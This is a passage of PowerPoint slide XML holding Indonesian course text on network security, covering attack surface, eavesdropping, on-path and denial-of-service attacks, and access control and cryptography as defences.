              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengeksekusinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meminimalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, administrator </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permukaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghilangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atribut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerahasiaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>integritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kurangnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kerahasiaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengintip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memulihkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sensitif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digambarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyadapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kurangnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Integritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memasang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengintip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencegat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memodifikasinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>palsu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digambarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jalur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kurangnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gangguan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digambarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penolakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (DoS).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerangka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>solusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengotorisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengaudit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, host, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>vektor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>spesifik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Akses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Langsung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
